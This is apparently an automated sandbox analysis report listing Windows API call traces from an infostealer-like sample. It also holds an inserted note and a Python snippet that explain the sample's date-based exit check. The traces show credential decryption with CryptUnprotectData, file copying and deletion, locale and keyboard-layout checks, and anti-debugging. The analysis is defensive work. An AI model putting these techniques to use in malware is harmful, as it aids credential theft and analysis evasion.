                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 007EF985
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 007EF9D6
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 007EF9EC
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFD18
                                    • FindClose.KERNEL32(000000FF), ref: 007EFD2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                    • Instruction ID: cb5a803f6e8b2001fd027fbad0fcfa7788fc03a188260ed832d06a0dfee70cfd
                                    • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                    • Instruction Fuzzy Hash: BDB131B1A00258EBCB24EF60DD5AEFE7379AF54300F4081A9E54E56251EF385B49CF92
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*$@
                                    • API String ID: 433455689-2355794846
                                    • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                    • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                    • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                    • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 007E1B8A
                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 007E1BDA
                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 007E1BF0
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1FA7
                                    • DeleteFileA.KERNEL32(00000000), ref: 007E2031
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007E2087
                                    • FindClose.KERNEL32(000000FF), ref: 007E2099
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 1415058207-0
                                    • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                    • Instruction ID: 5643f5ad0212a76c91e28c0b79c6aa83928e19bacf5511a84a592301d8e816e3
                                    • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                    • Instruction Fuzzy Hash: B612B1B191121CEBCB19EB60DD6AEFD7379AF54300F408199B20A62291EF785F89CF51
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 007EE0C5
                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 007EE115
                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 007EE12B
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE647
                                    • FindClose.KERNEL32(000000FF), ref: 007EE659
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2325840235-0
                                    • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                    • Instruction ID: 48fec98dbed3b9a664c7b26953941baa832ccd5cad23b88e2160f1c5e9185fc2
                                    • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                    • Instruction Fuzzy Hash: 0BF191B191421CEACB19EB60DDA9EFE7339AF14300F4045E9B14E62291DF386F89CE51
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                    • LocalFree.KERNEL32(00000000), ref: 00417D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                    • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                    • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                    • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                    APIs
                                    • memset.MSVCRT ref: 007ECABA
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007ECAD8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007ECAE3
                                    • memcpy.MSVCRT(?,?,?), ref: 007ECB79
                                    • lstrcat.KERNEL32(?,00420B46), ref: 007ECBAA
                                    • lstrcat.KERNEL32(?,00420B47), ref: 007ECBBE
                                    • lstrcat.KERNEL32(?,00420B4E), ref: 007ECBDF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 1498829745-0
                                    • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                    • Instruction ID: 4fa49347a7e39cd37a8632338e2e8fc06907e80369b15df1cfb4f6de1538f460
                                    • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                    • Instruction Fuzzy Hash: 674182B8944219EFDB10DFD0DC89BFEBBB9BB48304F1045A8E509A6280D7745B84CF95
                                    APIs
                                    • memset.MSVCRT ref: 0040C853
                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A12E70), ref: 0040C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                    • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                    • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                    • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                    • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 1498829745-0
                                    • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                    • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                    • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                    • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                    APIs
                                    • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00A12D90,?,0042110C,?,00000000,?), ref: 0041696C
                                    • sscanf.NTDLL ref: 00416999
                                    • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00A12D90,?,0042110C), ref: 004169B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00A12D90,?,0042110C), ref: 004169C0
                                    • ExitProcess.KERNEL32 ref: 004169DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID: B
                                    • API String ID: 2533653975-2248957098
                                    • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                    • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                    • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                    • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
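The chain listed above (GetSystemTime, sscanf, SystemTimeToFileTime on the current time and again on the parsed value, then ExitProcess) has the shape of a build-expiry gate: both times are converted to FILETIME, a 64-bit count of 100-ns ticks since 1601-01-01 UTC, because a FILETIME compares as a single integer whereas a SYSTEMTIME does not. The Python below is an added example, not part of the Joe Sandbox report and not the sample's code; it reproduces that comparison. The sscanf layout (day.month.year) and the choice to treat an unparsable string as "no gate" are assumptions made for illustration, since the report only shows that sscanf runs before the second SystemTimeToFileTime.

```python
from datetime import datetime, timedelta, timezone
import re

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # FILETIME unit is 100 ns


def to_filetime(dt):
    """SystemTimeToFileTime equivalent: 100-ns ticks since 1601-01-01 UTC."""
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def from_filetime(ticks):
    """Inverse conversion, for FILETIME constants read out of a memory dump."""
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


def parse_deadline(text):
    """Mimics sscanf(text, "%d.%d.%d", &day, &month, &year) filling a SYSTEMTIME.
    The day.month.year layout is an assumption, not something the report shows."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None  # fewer than three conversions: sscanf would return < 3
    day, month, year = map(int, m.groups())
    try:
        return datetime(year, month, day, tzinfo=timezone.utc)
    except ValueError:
        return None  # SystemTimeToFileTime fails on an invalid SYSTEMTIME


def should_exit(deadline_text, now=None):
    """True when the current FILETIME is past the deadline FILETIME, i.e. the
    point at which the listed chain would reach ExitProcess. An unparsable
    deadline is treated as 'no gate' (assumption)."""
    now = now or datetime.now(timezone.utc)
    deadline = parse_deadline(deadline_text)
    if deadline is None:
        return False
    return to_filetime(now) > to_filetime(deadline)


if __name__ == "__main__":
    print(to_filetime(parse_deadline("01.01.1970")))  # 116444736000000000
    print(should_exit("31.12.2099"), should_exit("01.01.2020"))
```

The practical consequence for analysis is that the sandbox clock, not the sample's age, decides whether this function reaches ExitProcess; from_filetime turns a FILETIME constant found in a dump back into a date so the deadline can be read off directly.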
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,S~,40000001,00000000,00000000,?,007E53EB), ref: 007F9127
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID: S~
                                    • API String ID: 80407269-3256534576
                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction ID: d1fb573f6efb68a859a21cc0debf4c7c341ec110d8a81317800e7d5b023ea845
                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction Fuzzy Hash: 9D11DA7420420DFFDB00CF94D889FB633AAAF89754F109568FA198B350D779E842DB60
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D56
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,007E5155,00000000,?), ref: 007E9D68
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D91
                                    • LocalFree.KERNEL32(?,?,?,?,007E5155,00000000,?), ref: 007E9DA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: UQ~
                                    • API String ID: 4291131564-2167080295
                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction ID: 2a0c0e3469b292b3bb37d34abbb6204dccf7e7d99175001d8c1f2440c778cf81
                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction Fuzzy Hash: 1011A4B4241208BFEB10CFA4CC95FAA77B5EB89704F208058FE159B390C776A901CB90
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: N@
                                    • API String ID: 4291131564-4229412743
                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 007F7E48
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007F7E60
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7E74
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7EC9
                                    • LocalFree.KERNEL32(00000000), ref: 007F7F89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID:
                                    • API String ID: 3090951853-0
                                    • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                    • Instruction ID: 72375882d8d3bb4f979f8fcbec3901640d6cb4a5c7ea8415c77a492cc154186c
                                    • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                    • Instruction Fuzzy Hash: 7E4109B195021CEBDB24DB94DC99BEDB3B5EB44700F204199E109A6291DB782F89CFA1
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 007FBE09
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007FBE1E
                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 007FBE29
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 007FBE45
                                    • TerminateProcess.KERNEL32(00000000), ref: 007FBE4C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction ID: e0111645a40e5ac2e1eda15e64a54d8a1b641bee015c190751e0bf38f6ee24c2
                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction Fuzzy Hash: 0C21A3BC900209DFDB14DF69F8896963BE4FB0A314F504039E90987365EBB45981EF49
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007E74B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E74BB
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E74E8
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007E750B
                                    • LocalFree.KERNEL32(?), ref: 007E7515
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction ID: 9b8927ce15ed102bb347bb3db5f16bfb77a69d55a00d99fec3ee346bc39ad6ce
                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction Fuzzy Hash: 17010075A80208BBEB14DFD4DD45F9D77B9EB48704F104155F705AA2C0D674AA008B65
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 3657800372-0
                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
